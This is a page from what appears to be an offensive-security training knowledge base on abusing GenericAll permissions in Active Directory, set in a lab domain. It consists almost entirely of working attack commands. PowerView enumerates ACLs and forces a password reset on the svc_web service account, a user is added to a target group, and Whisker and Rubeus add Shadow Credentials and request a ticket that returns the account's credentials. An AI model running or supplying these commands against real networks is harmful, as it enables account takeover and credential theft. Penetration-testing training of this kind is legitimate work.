Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 04. Techniques / ACL Abuse / GenericAll / Techniques

Windows

PowerView pre-check:

Import-Module .\PowerView.ps1

$BenSid = ConvertTo-SID 'OOTW\ben.carter'
$GroupSid = ConvertTo-SID 'OOTW\ACL Operators'

Get-DomainObjectAcl -Identity 'svc_web' -ResolveGUIDs |
    Where-Object { $_.SecurityIdentifier -in @($BenSid, $GroupSid) }

Reset a user password with PowerView:

$Password = ConvertTo-SecureString 'StudentPass2026!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('OOTW\ben.carter', $Password)
$NewPassword = ConvertTo-SecureString 'WebReset2026!' -AsPlainText -Force

Set-DomainUserPassword -Identity 'svc_web' -AccountPassword $NewPassword -Credential $Cred -Verbose

Native user reset:

$NewPassword = ConvertTo-SecureString 'WebReset2026!' -AsPlainText -Force
Set-ADAccountPassword -Identity 'svc_web' -Reset -NewPassword $NewPassword

Group target:

Add-ADGroupMember -Identity 'TARGET GROUP' -Members 'alice.wright'

Shadow Credentials from Windows:

.\Whisker.exe add /target:svc_web /domain:ootw.local /dc:OOTW-DC01.ootw.local /path:svc_web.pfx /password:PfxPass2026!
.\Rubeus.exe asktgt /user:svc_web /certificate:svc_web.pfx /password:PfxPass2026! /domain:ootw.local /dc:OOTW-DC01.ootw.local /getcredentials /nowrap